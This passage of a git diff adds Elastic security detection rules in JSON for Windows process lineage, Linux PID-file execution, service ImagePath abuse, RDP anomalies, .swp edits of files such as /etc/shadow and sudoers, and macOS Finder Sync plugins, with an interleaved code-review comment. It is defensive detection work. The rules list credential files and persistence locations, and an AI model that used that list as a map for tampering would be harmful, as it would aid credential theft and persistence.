This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\nprocess.parent.name != null and\n (\n /* suspicious parent processes */\n (process.name:\"autochk.exe\" and not process.parent.name:\"smss.exe\") or\n (process.name:(\"fontdrvhost.exe\", \"dwm.exe\") and not process.parent.name:(\"wininit.exe\", \"winlogon.exe\")) or\n (process.name:(\"consent.exe\", \"RuntimeBroker.exe\", \"TiWorker.exe\") and not process.parent.name:\"svchost.exe\") or\n (process.name:\"SearchIndexer.exe\" and not process.parent.name:\"services.exe\") or\n (process.name:\"SearchProtocolHost.exe\" and not process.parent.name:(\"SearchIndexer.exe\", \"dllhost.exe\")) or\n (process.name:\"dllhost.exe\" and not process.parent.name:(\"services.exe\", \"svchost.exe\")) or\n (process.name:\"smss.exe\" and not process.parent.name:(\"System\", \"smss.exe\")) or\n (process.name:\"csrss.exe\" and not process.parent.name:(\"smss.exe\", \"svchost.exe\")) or\n (process.name:\"wininit.exe\" and not process.parent.name:\"smss.exe\") or\n (process.name:\"winlogon.exe\" and not process.parent.name:\"smss.exe\") or\n (process.name:(\"lsass.exe\", \"LsaIso.exe\") and not process.parent.name:\"wininit.exe\") or\n (process.name:\"LogonUI.exe\" and not process.parent.name:(\"wininit.exe\", \"winlogon.exe\")) or\n (process.name:\"services.exe\" and not process.parent.name:\"wininit.exe\") or\n (process.name:\"svchost.exe\" and not process.parent.name:(\"MsMpEng.exe\", \"services.exe\", \"svchost.exe\")) or\n (process.name:\"spoolsv.exe\" and not process.parent.name:\"services.exe\") or\n 
(process.name:\"taskhost.exe\" and not process.parent.name:(\"services.exe\", \"svchost.exe\", \"ngentask.exe\")) or\n (process.name:\"taskhostw.exe\" and not process.parent.name:(\"services.exe\", \"svchost.exe\")) or\n (process.name:\"userinit.exe\" and not process.parent.name:(\"dwm.exe\", \"winlogon.exe\")) or\n (process.name:(\"wmiprvse.exe\", \"wsmprovhost.exe\", \"winrshost.exe\") and not process.parent.name:\"svchost.exe\") or\n /* suspicious child processes */\n (process.parent.name:(\"SearchProtocolHost.exe\", \"taskhost.exe\", \"csrss.exe\") and not process.name:(\"werfault.exe\", \"wermgr.exe\", \"WerFaultSecure.exe\", \"conhost.exe\")) or\n (process.parent.name:\"autochk.exe\" and not process.name:(\"chkdsk.exe\", \"doskey.exe\", \"WerFault.exe\")) or\n (process.parent.name:\"smss.exe\" and not process.name:(\"autochk.exe\", \"smss.exe\", \"csrss.exe\", \"wininit.exe\", \"winlogon.exe\", \"setupcl.exe\", \"WerFault.exe\")) or\n (process.parent.name:\"wermgr.exe\" and not process.name:(\"WerFaultSecure.exe\", \"wermgr.exe\", \"WerFault.exe\")) or\n (process.parent.name:\"conhost.exe\" and not process.name:(\"mscorsvw.exe\", \"wermgr.exe\", \"WerFault.exe\", \"WerFaultSecure.exe\"))\n )\n", + "references": [ + "https://github.com/sbousseaden/Slides/blob/master/Hunting%20MindMaps/PNG/Windows%20Processes%20TH.map.png", + "https://www.andreafortuna.org/2017/06/15/standard-windows-processes-a-brief-reference/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": 
"35df0dd8-092d-4a83-88c1-5151a804f31b", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1055", + "name": "Process Injection", + "reference": "https://attack.mitre.org/techniques/T1055/", + "subtechnique": [ + { + "id": "T1055.012", + "name": "Process Hollowing", + "reference": "https://attack.mitre.org/techniques/T1055/012/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 111 + }, + "id": "35df0dd8-092d-4a83-88c1-5151a804f31b_111", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/3688577a-d196-11ec-90b0-f661ea17fbce_109.json b/packages/security_detection_engine/kibana/security_rule/3688577a-d196-11ec-90b0-f661ea17fbce_109.json new file mode 100644 index 00000000000..eb697d3ae5b --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/3688577a-d196-11ec-90b0-f661ea17fbce_109.json 
@@ -0,0 +1,97 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies a new process starting from a process ID (PID), lock or reboot file within the temporary file storage paradigm (tmpfs) directory /var/run directory. On Linux, the PID files typically hold the process ID to track previous copies running and manage other tasks. Certain Linux malware use the /var/run directory for holding data, executables and other tasks, disguising itself or these files as legitimate PID files.", + "false_positives": [ + "False-Positives (FP) should be at a minimum with this detection as PID files are meant to hold process IDs, not inherently be executables that spawn processes." + ], + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Process Started from Process ID (PID) File", + "note": "## Triage and analysis\n\n### Investigating Process Started from Process ID (PID) File\nDetection alerts from this rule indicate a process spawned from an executable masqueraded as a legitimate PID file which is very unusual and should not occur. 
Here are some possible avenues of investigation:\n- Examine parent and child process relationships of the new process to determine if other processes are running.\n- Examine the /var/run directory using Osquery to determine other potential PID files with unsually large file sizes, indicative of it being an executable: \"SELECT f.size, f.uid, f.type, f.path from file f WHERE path like '/var/run/%%';\"\n- Examine the reputation of the SHA256 hash from the PID file in a database like VirusTotal to identify additional pivots and artifacts for investigation.\n", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and user.id == \"0\" and\n process.executable regex~ \"\"\"/var/run/\\w+\\.(pid|lock|reboot)\"\"\"\n", + "references": [ + "https://www.sandflysecurity.com/blog/linux-file-masquerading-and-malicious-pids-sandfly-1-2-6-update/", + "https://twitter.com/GossiTheDog/status/1522964028284411907", + "https://exatrack.com/public/Tricephalic_Hellkeeper.pdf", + "https://www.elastic.co/security-labs/a-peek-behind-the-bpfdoor" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "3688577a-d196-11ec-90b0-f661ea17fbce", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Threat: BPFDoor", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Auditd Manager" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "3688577a-d196-11ec-90b0-f661ea17fbce_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/36a8e048-d888-4f61-a8b9-0f9e2e40f317_106.json b/packages/security_detection_engine/kibana/security_rule/36a8e048-d888-4f61-a8b9-0f9e2e40f317_106.json new file mode 100644 index 00000000000..14f9a06ff83 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/36a8e048-d888-4f61-a8b9-0f9e2e40f317_106.json 
@@ -0,0 +1,98 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the creation of a suspicious ImagePath value. This could be an indication of an adversary attempting to stealthily persist or escalate privileges through abnormal service creation.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious ImagePath Service Creation", + "query": "registry where host.os.type == \"windows\" and registry.path : (\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Services\\\\*\\\\ImagePath\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SYSTEM\\\\ControlSet*\\\\Services\\\\*\\\\ImagePath\"\n ) and\n /* add suspicious registry ImagePath values here */\n registry.data.strings : (\"%COMSPEC%*\", \"*\\\\.\\\\pipe\\\\*\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "36a8e048-d888-4f61-a8b9-0f9e2e40f317", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1543", + "name": "Create or Modify System Process", + "reference": "https://attack.mitre.org/techniques/T1543/", + "subtechnique": [ + { + "id": "T1543.003", + "name": "Windows Service", + "reference": "https://attack.mitre.org/techniques/T1543/003/" + } + ] + } + 
] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1112", + "name": "Modify Registry", + "reference": "https://attack.mitre.org/techniques/T1112/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 106 + }, + "id": "36a8e048-d888-4f61-a8b9-0f9e2e40f317_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/36a8e048-d888-4f61-a8b9-0f9e2e40f317_107.json b/packages/security_detection_engine/kibana/security_rule/36a8e048-d888-4f61-a8b9-0f9e2e40f317_107.json new file mode 100644 index 00000000000..cc32c27c6d7 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/36a8e048-d888-4f61-a8b9-0f9e2e40f317_107.json 
@@ -0,0 +1,98 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the creation of a suspicious ImagePath value. This could be an indication of an adversary attempting to stealthily persist or escalate privileges through abnormal service creation.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.registry-*", + "endgame-*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious ImagePath Service Creation", + "query": "registry where host.os.type == \"windows\" and registry.path : (\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Services\\\\*\\\\ImagePath\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SYSTEM\\\\ControlSet*\\\\Services\\\\*\\\\ImagePath\"\n ) and\n /* add suspicious registry ImagePath values here */\n registry.data.strings : (\"%COMSPEC%*\", \"*\\\\.\\\\pipe\\\\*\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "36a8e048-d888-4f61-a8b9-0f9e2e40f317", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1543", + "name": "Create or Modify System Process", + "reference": "https://attack.mitre.org/techniques/T1543/", + "subtechnique": [ + { + "id": "T1543.003", + "name": "Windows Service", + "reference": "https://attack.mitre.org/techniques/T1543/003/" + } + 
] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1112", + "name": "Modify Registry", + "reference": "https://attack.mitre.org/techniques/T1112/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 107 + }, + "id": "36a8e048-d888-4f61-a8b9-0f9e2e40f317_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/36c48a0c-c63a-4cbc-aee1-8cac87db31a9_3.json b/packages/security_detection_engine/kibana/security_rule/36c48a0c-c63a-4cbc-aee1-8cac87db31a9_3.json new file mode 100644 index 00000000000..22883c5d7d7 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/36c48a0c-c63a-4cbc-aee1-8cac87db31a9_3.json 
@@ -0,0 +1,61 @@ +{ + "attributes": { + "anomaly_threshold": 70, + "author": [ + "Elastic" + ], + "description": "A machine learning job has detected unusually high number of process arguments in an RDP session. Executing sophisticated attacks such as lateral movement can involve the use of complex commands, obfuscation mechanisms, redirection and piping, which in turn increases the number of arguments in a command.", + "from": "now-12h", + "interval": "15m", + "license": "Elastic License v2", + "machine_learning_job_id": "lmd_high_mean_rdp_process_args", + "name": "High Mean of Process Arguments in an RDP Session", + "references": [ + "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html", + "https://docs.elastic.co/en/integrations/lmd", + "https://www.elastic.co/blog/detecting-lateral-movement-activity-a-new-kibana-integration", + "https://www.elastic.co/blog/remote-desktop-protocol-connections-elastic-security" + ], + "related_integrations": [ + { + "package": "lmd", + "version": "^2.0.0" + }, + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "risk_score": 21, + "rule_id": "36c48a0c-c63a-4cbc-aee1-8cac87db31a9", + "setup": "## Setup\n\nThe rule requires the Lateral Movement Detection integration assets to be installed, as well as file and Windows RDP process events collected by the Elastic Defend integration. \n\n### Lateral Movement Detection Setup\nThe Lateral Movement Detection integration detects lateral movement activity by identifying abnormalities in file and Windows RDP events. 
Anomalies are detected using Elastic's Anomaly Detection feature.\n\n#### Prerequisite Requirements:\n- Fleet is required for Lateral Movement Detection.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n- Windows RDP process events collected by the [Elastic Defend](https://docs.elastic.co/en/integrations/endpoint) integration.\n- To install Elastic Defend, refer to the [documentation](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n#### The following steps should be executed to install assets associated with the Lateral Movement Detection integration:\n- Go to the Kibana homepage. Under Management, click Integrations.\n- In the query bar, search for Lateral Movement Detection and select the integration to see more details about it.\n- Under Settings, click Install Lateral Movement Detection assets and follow the prompts to install the assets.\n\n#### Anomaly Detection Setup\nBefore you can enable rules for Lateral Movement Detection, you'll need to enable the corresponding Anomaly Detection jobs.\n- Before enabling the Anomaly Detection jobs, confirm that the Pivot Transform asset is installed and actively gathering data in the destination index `ml-rdp-lmd`.\n- Go to the Kibana homepage. Under Analytics, click Machine Learning.\n- Under Anomaly Detection, click Jobs, and then click \"Create job\". 
Select the Data View containing your transformed RDP process data i.e.`ml-rdp-lmd`.\n- If the selected Data View contains events that match the query in [this](https://github.com/elastic/integrations/blob/main/packages/lmd/kibana/ml_module/lmd-ml.json) configuration file, you will see a card for Lateral Movement Detection under \"Use preconfigured jobs\".\n- Keep the default settings and click \"Create jobs\" to start the anomaly detection jobs and datafeeds.\n", + "severity": "low", + "tags": [ + "Use Case: Lateral Movement Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Tactic: Lateral Movement" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1210", + "name": "Exploitation of Remote Services", + "reference": "https://attack.mitre.org/techniques/T1210/" + } + ] + } + ], + "type": "machine_learning", + "version": 3 + }, + "id": "36c48a0c-c63a-4cbc-aee1-8cac87db31a9_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/3728c08d-9b70-456b-b6b8-007c7d246128_4.json b/packages/security_detection_engine/kibana/security_rule/3728c08d-9b70-456b-b6b8-007c7d246128_4.json new file mode 100644 index 00000000000..b2cc0f01bdc --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/3728c08d-9b70-456b-b6b8-007c7d246128_4.json 
@@ -0,0 +1,128 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule monitors for the potential edit of a suspicious file. In Linux, when editing a file through an editor, a temporary .swp file is created. By monitoring for the creation of this .swp file, we can detect potential file edits of suspicious files. The execution of this rule is not a clear sign of the file being edited, as just opening the file through an editor will trigger this event. Attackers may alter any of the files added in this rule to establish persistence, escalate privileges or perform reconnaisance on the system.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "max_signals": 1, + "name": "Potential Suspicious File Edit", + "query": "file where event.action in (\"creation\", \"file_create_event\") and file.extension == \"swp\" and \nfile.path : (\n /* common interesting files and locations */\n \"/etc/.shadow.swp\", \"/etc/.shadow-.swp\", \"/etc/.shadow~.swp\", \"/etc/.gshadow.swp\", \"/etc/.gshadow-.swp\",\n \"/etc/.passwd.swp\", \"/etc/.pwd.db.swp\", \"/etc/.master.passwd.swp\", \"/etc/.spwd.db.swp\", \"/etc/security/.opasswd.swp\",\n \"/etc/.environment.swp\", \"/etc/.profile.swp\", \"/etc/sudoers.d/.*.swp\", \"/etc/ld.so.conf.d/.*.swp\",\n \"/etc/init.d/.*.swp\", \"/etc/.rc.local.swp\", \"/etc/rc*.d/.*.swp\", \"/dev/shm/.*.swp\", \"/etc/update-motd.d/.*.swp\",\n \"/usr/lib/update-notifier/.*.swp\",\n\n /* service, timer, want, socket and lock files */\n \"/etc/systemd/system/.*.swp\", \"/usr/local/lib/systemd/system/.*.swp\", \"/lib/systemd/system/.*.swp\",\n \"/usr/lib/systemd/system/.*.swp\",\"/home/*/.config/systemd/user/.*.swp\", \"/run/.*.swp\", \"/var/run/.*.swp/\",\n\n /* profile and shell configuration files */ \n \"/home/*.profile.swp\", \"/home/*.bash_profile.swp\", \"/home/*.bash_login.swp\", \"/home/*.bashrc.swp\", \"/home/*.bash_logout.swp\",\n 
\"/home/*.zshrc.swp\", \"/home/*.zlogin.swp\", \"/home/*.tcshrc.swp\", \"/home/*.kshrc.swp\", \"/home/*.config.fish.swp\",\n \"/root/*.profile.swp\", \"/root/*.bash_profile.swp\", \"/root/*.bash_login.swp\", \"/root/*.bashrc.swp\", \"/root/*.bash_logout.swp\",\n \"/root/*.zshrc.swp\", \"/root/*.zlogin.swp\", \"/root/*.tcshrc.swp\", \"/root/*.kshrc.swp\", \"/root/*.config.fish.swp\"\n)\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "3728c08d-9b70-456b-b6b8-007c7d246128", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Privilege Escalation", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1037", + "name": "Boot or Logon Initialization Scripts", + "reference": "https://attack.mitre.org/techniques/T1037/", + "subtechnique": [ + { + "id": "T1037.004", + "name": "RC Scripts", + "reference": "https://attack.mitre.org/techniques/T1037/004/" + } + ] + }, + { + "id": "T1574", + "name": "Hijack Execution Flow", + "reference": "https://attack.mitre.org/techniques/T1574/", + "subtechnique": [ + { + "id": "T1574.006", + "name": "Dynamic Linker Hijacking", + "reference": "https://attack.mitre.org/techniques/T1574/006/" + } + ] + }, + { + "id": "T1543", + "name": "Create or Modify System Process", + "reference": "https://attack.mitre.org/techniques/T1543/", + "subtechnique": [ + { + "id": "T1543.002", + "name": "Systemd Service", + "reference": 
"https://attack.mitre.org/techniques/T1543/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1548", + "name": "Abuse Elevation Control Mechanism", + "reference": "https://attack.mitre.org/techniques/T1548/", + "subtechnique": [ + { + "id": "T1548.003", + "name": "Sudo and Sudo Caching", + "reference": "https://attack.mitre.org/techniques/T1548/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 4 + }, + "id": "3728c08d-9b70-456b-b6b8-007c7d246128_4", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/37f638ea-909d-4f94-9248-edd21e4a9906_106.json b/packages/security_detection_engine/kibana/security_rule/37f638ea-909d-4f94-9248-edd21e4a9906_106.json new file mode 100644 index 00000000000..86f8dbbea69 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/37f638ea-909d-4f94-9248-edd21e4a9906_106.json 
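Review bot: The `file.path` list in the query (this hunk, the "service, timer, want, socket and lock files" group) contains `"/var/run/.*.swp/"` with a trailing slash; a file path never ends in `/`, so that entry is dead and swap files under `/var/run` are not covered, while the neighbouring `"/run/.*.swp"` shows the intended form. It should read `"/var/run/.*.swp"`; whether the endpoint reports the literal `/var/run/...` path or the `/run/...` target of the usual symlink is not visible here, so keeping both entries is the safe choice. Since this JSON looks like a packaged copy of an upstream rule, the fix presumably belongs in the rule source as well as in this file. Separately, `"max_signals": 1` caps the rule at one alert per execution, so edits to two different listed files inside the same interval would surface as a single alert — worth a comment in the rule source if that is deliberate. The description also misspells "reconnaissance" as "reconnaisance".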
@@ -0,0 +1,88 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Finder Sync plugins enable users to extend Finder\u2019s functionality by modifying the user interface. Adversaries may abuse this feature by adding a rogue Finder Plugin to repeatedly execute malicious payloads for persistence.", + "false_positives": [ + "Trusted Finder Sync Plugins" + ], + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Finder Sync Plugin Registered and Enabled", + "query": "process where host.os.type == \"macos\" and event.type in (\"start\", \"process_started\") and process.name : \"pluginkit\" and\n process.args : \"-e\" and process.args : \"use\" and process.args : \"-i\" and\n not process.args :\n (\n \"com.google.GoogleDrive.FinderSyncAPIExtension\",\n \"com.google.drivefs.findersync\",\n \"com.boxcryptor.osx.Rednif\",\n \"com.adobe.accmac.ACCFinderSync\",\n \"com.microsoft.OneDrive.FinderSync\",\n \"com.insynchq.Insync.Insync-Finder-Integration\",\n \"com.box.desktop.findersyncext\"\n ) and\n not process.parent.executable : (\n \"/Library/Application Support/IDriveforMac/IDriveHelperTools/FinderPluginApp.app/Contents/MacOS/FinderPluginApp\"\n )\n", + "references": [ + "https://github.com/specterops/presentations/raw/master/Leo%20Pitt/Hey_Im_Still_in_Here_Modern_macOS_Persistence_SO-CON2020.pdf" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "37f638ea-909d-4f94-9248-edd21e4a9906", + "setup": "## Setup\n\nThis rule 
requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1543", + "name": "Create or Modify System Process", + "reference": "https://attack.mitre.org/techniques/T1543/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 106 + }, + "id": "37f638ea-909d-4f94-9248-edd21e4a9906_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/3838e0e3-1850-4850-a411-2e8c5ba40ba8_110.json b/packages/security_detection_engine/kibana/security_rule/3838e0e3-1850-4850-a411-2e8c5ba40ba8_110.json new file mode 100644 index 00000000000..81433f6247a --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/3838e0e3-1850-4850-a411-2e8c5ba40ba8_110.json 
